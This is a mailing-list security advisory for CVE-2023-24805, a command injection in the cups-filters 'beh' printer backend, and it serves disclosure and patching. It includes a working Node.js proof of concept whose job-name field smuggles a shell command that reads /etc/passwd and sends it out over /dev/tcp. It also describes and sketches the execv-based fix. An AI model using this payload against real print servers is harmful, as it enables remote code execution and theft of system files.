List:       oss-security
Subject:    [oss-security] CVE-2023-24805: RCE in cups-filters, beh CUPS backend
From:       Till Kamppeter <till.kamppeter () gmail ! com>
Date:       2023-05-17 9:30:11
Message-ID: d20c573e-81ca-800d-5bf8-c2f96b31ea82 () gmail ! com

The following bug got reported to OpenPrinting's GitHub, repo cups-filters, 
as a private (security) issue report:

https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x

Summary

If you use "beh" to create an accessible network printer, this security 
vulnerability can cause remote code execution.

Details

cups-filters/backend/beh.c, line 288 in 5c9498a:

      // (context: argv = beh <job-id> <user> <title> <copies> <options> [file])
      snprintf(cmdline, sizeof(cmdline),
               "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
               cups_serverbin, scheme, argv[1], argv[2], argv[3],
               ...
               (argc == 6 ? "1" : argv[4]),
               argv[5], filename);
      ...
      retval = system(cmdline) >> 8;

system() is called here to execute the command, and the user and title 
parameters it interpolates are user-controlled and unsanitized.

PoC

Start a beh service:

      lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100

Exploit (uses https://github.com/williamkapke/ipp):

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);

doc.pipe(concat(function (data) {
  var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
  var msg = {
    "operation-attributes-tag": {
      "requesting-user-name": "Bumblebee",
      "job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
      "document-format": "application/pdf"
    },
    "job-attributes-tag": {
      "media-col": {
        "media-source": "tray-2"
      }
    },
    data: data
  };
  printer.execute("Print-Job", msg, function(err, res){
    console.log(err);
    console.log(res);
  });
}));
doc.end();


The report got assigned CVE-2023-24805.

A fix is to use execv() instead of system() and was proposed as a pull 
request attached to the bug report.

https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1
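
To illustrate what that change buys, here is an added example (my own sketch, not the code in beh.c or in the pull request): the backend is started with fork() and execv(), each field of the job as its own argv element, so a title such as quarterly'; id #.pdf is handed over as one literal string and never re-parsed by /bin/sh. The backend path and job values are constructed placeholders.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* A CUPS backend is started as
 *   <path> <job-id> <user> <title> <copies> <options> [file]
 * Each field becomes its own argv entry, so a user name or title such as
 * "quarterly'; id #.pdf" reaches the backend as one literal string instead of
 * being re-parsed by /bin/sh.  Hypothetical helpers, not beh.c's own code. */
#define BACKEND_ARGC 7

/* Fill a NULL-terminated vector for execv(); returns the argument count. */
int build_backend_argv(char *argv[BACKEND_ARGC + 1], char *path, char *job_id,
                       char *user, char *title, char *copies, char *options,
                       char *file)
{
    argv[0] = path;    argv[1] = job_id;  argv[2] = user;   argv[3] = title;
    argv[4] = copies;  argv[5] = options; argv[6] = file;   argv[7] = NULL;
    return BACKEND_ARGC;
}

/* Run the backend without a shell and return its exit status (what beh took
 * from system(cmdline) >> 8).  127 means the backend could not be executed;
 * -1 means fork()/waitpid() failed or the child died from a signal. */
int run_backend(char *path, char *job_id, char *user, char *title,
                char *copies, char *options, char *file)
{
    char *argv[BACKEND_ARGC + 1];
    int status;
    pid_t pid;

    build_backend_argv(argv, path, job_id, user, title, copies, options, file);
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(path, argv);   /* argv goes to the backend verbatim */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed job; /bin/true stands in for the real backend binary. */
    return run_backend("/bin/true", "1", "Bumblebee", "quarterly'; id #.pdf",
                       "1", "", "/tmp/job.pdf") == 0 ? 0 : 1;
}
```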

The pull request is merged now into

https://github.com/OpenPrinting/cups-filters (branch "master")

as commit

https://github.com/OpenPrinting/cups-filters/commit/8f274035756

and the fix is also ported to the "1.x" branch of cups-filters, as commit

https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.

    Till